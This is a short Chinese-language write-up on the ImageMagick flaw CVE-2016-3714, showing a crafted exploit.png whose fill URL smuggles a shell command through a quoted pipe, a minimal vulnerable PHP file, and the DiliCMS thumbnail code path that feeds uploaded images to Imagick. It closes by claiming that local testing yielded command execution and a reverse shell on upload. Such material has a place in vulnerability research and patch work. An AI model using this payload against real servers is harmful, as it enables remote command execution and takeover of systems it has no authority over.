ImageMagick
ImageMagic CVE-2016-3714 影响范围较广,以PHP的Imagick为最。
构建exploit.png1
2
3
4push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
然后构建vul.php文件1
2
3<?php
new Imagick('exploit.png');
?>
访问vul.php就会导致命令执行,显示文件目录
DiliCMS
以Dili为例
/admin/controllers/attachment.php,该文件中的缩略图方法调用了$this->tailor->initialize($target, $ext);1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30......
private function thumbnail($model_type, $model, $target, $ext)
{
//do we have thumbnail settings for target model?
if ($model_type and $model and in_array($model_type, array('model', 'category'))) {
if ($model_type == 'model') {
$this->settings->load('model/' . $model);
$target_model = $this->settings->item('models');
$target_model = $target_model[$model];
} elseif ($model_type == 'category') {
$this->settings->load('category/cate_' . $model);
$target_model = $this->settings->item('cate_models');
$target_model = $target_model[$model];
}
$thumb_preferences = json_decode($target_model['thumb_preferences']);
if ($thumb_preferences and count($thumb_preferences->enabled) > 0) {
$thumbs_preferences = json_decode(setting('thumbs_preferences'));
if ($thumbs_preferences) {
$this->load->library('tailor');
foreach ($thumbs_preferences as $pref) {
if (in_array($pref->size, $thumb_preferences->enabled)) {
$this->tailor->initialize($target, $ext);
$this->tailor->measure($pref->size, $pref->rule);
$this->tailor->save($target.'.'.$pref->size);
}
}
return $thumb_preferences->default == 'original' ? '' : $thumb_preferences->default;
}
}
......
/shared/libraries/Tailor.php 在文件中调用了imagick并且实例化了传入的图片1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16class Tailor {
protected $imagick = null;
protected $ext = '';
protected $app = null;
protected $filePath = '';
public function initialize($image, $ext)
{
$this->imagick = new Imagick($image);
$this->ext = strtolower($ext);
}
Verify
本地搭建cms测试如下,在上传文件的过程中,可以执行命令,反弹shell